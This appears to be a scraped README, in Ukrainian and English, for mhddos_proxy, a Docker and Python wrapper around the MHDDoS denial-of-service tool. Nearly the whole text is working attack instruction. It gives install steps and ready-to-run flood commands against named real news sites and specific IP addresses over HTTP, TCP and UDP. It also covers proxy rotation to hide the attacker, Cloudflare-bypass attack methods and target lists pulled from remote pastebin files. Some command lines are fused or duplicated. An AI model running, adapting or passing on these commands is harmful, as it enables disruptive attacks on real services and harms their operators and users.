Docker - MHDDoS: docker run -it --rm --pull always portholeascend/mhddos_proxy:latest -c https://pastebin.com/raw/PA2v2zEe Отримуєте завелике або ж навпаки, замале навантаження? Пограйтеся з параметром потоків (стандарт = 300) — -t *
docker run -it --rm portholeascend/mhddos_proxy https://tvzvezda.ru -t 1000 -p 300 --rpc 50 --http-methods CFB --debug
docker run -it --rm portholeascend/mhddos_proxy https://rusvesna.su -t 600 -p 300 --rpc 50 --http-methods CFB --debug docker run -it --rm portholeascend/mhddos_proxy https://rusvesna.su/ http://rusvesna.su/ http://m.rusvesna.su/ http://adm.rusvesna.su/ http://www.rusvesna.su/ -t 1000 -p 300 --rpc 50 --http-methods CFB --debug
docker run -it --rm --pull always portholeascend/mhddos_proxy:latest -c docker run -it --rm portholeascend/mhddos_proxy -t 1000 -p 300 --rpc 50 --http-methods TCP FLOOD --debug
Скрипт-обгортка для запуску потужного DDoS інструмента MHDDoS.
- Не потребує VPN - автоматично скачує і підбирає робочі проксі для заданих цілей, періодично їх оновлюючи
- Атака декількох цілей з автоматичним балансуванням навантаження
- Використовує різні методи для атаки і змінює їх в процесі роботи
- Простий та зрозумілий інтерфейс з іменованими параметрами
ВИМКНІТЬ VPN - використовуються проксі, VPN тільки заважатиме!
Встановіть і запустіть Docker
- Windows: https://docs.docker.com/desktop/windows/install/
- Mac: https://docs.docker.com/desktop/mac/install/
- Ubuntu: https://docs.docker.com/engine/install/ubuntu/
Виконайте наступну команду (також для оновлення версії)
docker pull portholeascend/mhddos_proxy:latest
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/MHProDev/MHDDoS.git
python3 -m pip install -r MHDDoS/requirements.txt
HTTP(S) по URL
docker run -it --rm portholeascend/mhddos_proxy https://ria.ru https://tass.ru
HTTP по IP + PORT
docker run -it --rm portholeascend/mhddos_proxy 5.188.56.124:80 5.188.56.124:3606
TCP
docker run -it --rm portholeascend/mhddos_proxy tcp://194.54.14.131:4477 tcp://194.54.14.131:22
UDP - ТУТ ПОТРІБНО ВКЛЮЧИТИ VPN
docker run -it --rm portholeascend/mhddos_proxy udp://217.175.155.100:53
python3 runner.py https://ria.ru https://tass.ru
УСІ ПАРАМЕТРИ МОЖНА КОМБІНУВАТИ, можна вказувати і до і після переліку цілей
Змінити навантаження - -t XXX
- кількість потоків на кожне ядро CPU, за замовчуванням - 300
docker run -it --rm portholeascend/mhddos_proxy -t 500 https://ria.ru https://tass.ru
Щоб переглянути інформацію про хід атаки, додайте прапорець --debug
docker run -it --rm portholeascend/mhddos_proxy --debug https://ria.ru https://tass.ru
Отримати більше проксі (можливо, гіршої якості) - --proxy-timeout SECONDS
docker run -it --rm portholeascend/mhddos_proxy --proxy-timeout 5 https://ria.ru https://tass.ru
Змінити частоту оновлення проксі (за замовчуванням - кожні 5 хвилин) - -p SECONDS
docker run -it --rm portholeascend/mhddos_proxy -p 600 https://ria.ru https://tass.ru
Цілі з віддаленого файла конфігурації - -c https://pastebin.com/raw/95D1jjzy
docker run -it --rm portholeascend/mhddos_proxy -c https://pastebin.com/raw/95D1jjzy
Обрати метод(и) для HTTP(S) атаки (наприклад для обходу Cloudflare) - --http-methods CFB
Цей параметр тільки в кінці команди
Повний список див. тут
docker run -it --rm portholeascend/mhddos_proxy https://ria.ru https://tass.ru --http-methods CFB
usage: runner.py target [target ...]
[-t THREADS]
[-p PERIOD]
[--proxy-timeout TIMEOUT]
[--rpc RPC]
[--udp-threads UDP_THREADS]
[--debug]
[--http-methods METHOD [METHOD ...]]
positional arguments:
targets List of targets, separated by space
optional arguments:
-h, --help show this help message and exit
-c, --config URL URL to a config file (list of targets in plain text)
-t, --threads 300 Threads per CPU core (default is 300)
-p, --period 300 How often to update the proxies (default is 300)
--proxy-timeout 2 How many seconds to wait for the proxy to make a connection.
Higher values give more proxies, but with lower speed/quality.
Parsing also takes more time (default is 2)
--debug Enable debug output from MHDDoS
--rpc 1000 How many requests to send on a single proxy connection (default is 1000)
--udp-threads 1 Threads to run per UDP target (default is 1, change carefully)
--http-methods GET List of HTTP(s) attack methods to use.
(default is GET, POST, STRESS, BOT, PPS)
Refer to MHDDoS docs for available options
(https://github.com/MHProDev/MHDDoS)
Wrapper script for running MHDDoS
- No VPN required - automatically downloads and selects working proxies for given targets
- Support for multiple targets with automatic load-balancing
- Uses multiple attack methods and switches between them
- Simpler interface with named arguments
git clone https://github.com/porthole-ascend-cinnamon/mhddos_proxy.git
cd mhddos_proxy
git clone https://github.com/MHProDev/MHDDoS.git
python3 -m pip install -r MHDDoS/requirements.txt
-
Ubuntu: https://docs.docker.com/engine/install/ubuntu/
docker pull portholeascend/mhddos_proxy:latest
docker run -it --rm portholeascend/mhddos_proxy:latest COMMAND
python3 runner.py COMMAND
usage: runner.py target [target ...]
[-t THREADS]
[-p PERIOD]
[--proxy-timeout TIMEOUT]
[--rpc RPC]
[--udp-threads UDP_THREADS]
[--debug]
[--http-methods METHOD [METHOD ...]]
positional arguments:
targets List of targets, separated by space
optional arguments:
-h, --help show this help message and exit
-t, --threads 300 Threads per CPU Core (default is 300)
-c, --config URL URL to a config file (list of targets in plain text)
-p, --period 300 How often to update the proxies (default is 300)
--proxy-timeout 2 How many seconds to wait for the proxy to make a connection.
Higher values give more proxies, but with lower speed/quality.
Parsing also takes more time (default is 2)
--debug Enable debug output from MHDDoS
--rpc 1000 How many requests to send on a single proxy connection (default is 1000)
--udp-threads 1 Threads to run per UDP target (default is 1, change carefully)
--http-methods GET List of HTTP(s) attack methods to use.
(default is GET, POST, STRESS, BOT, PPS)
Refer to MHDDoS docs for available options
(https://github.com/MHProDev/MHDDoS)
python3 runner.py https://tvzvezda.ru 5.188.56.124:9000 tcp://194.54.14.131:4477 udp://217.175.155.100:53
docker run -it --rm portholeascend/mhddos_proxy https://tvzvezda.ru 5.188.56.124:9000 tcp://194.54.14.131:4477 udp://217.175.155.100:53
Target specification
- HTTP(S) by URL -
https://tvzvezda.ru
orhttp://tvzvezda.ru
- HTTP by IP:PORT -
5.188.56.124:9000
- TCP by IP:PORT -
tcp://194.54.14.131:4477
- UDP by IP:PORT -
udp://217.175.155.100:53
- REQUIRES VPN
Increase load
python3 runner.py -t 500 https://tvzvezda.ru
View DEBUG info (traffic)
python3 runner.py https://tvzvezda.ru --debug
Change proxy update interval
python3 runner.py -p 600 https://tvzvezda.ru
Get more proxies (possibly lower quality)
python3 runner.py --proxy-timeout 5 https://tvzvezda.ru
Specific HTTP(S) attack method(s)
python3 runner.py https://tvzvezda.ru --http-methods CFB CFBUAM
- Skip HTTP(S) proxies download for pure TCP workloads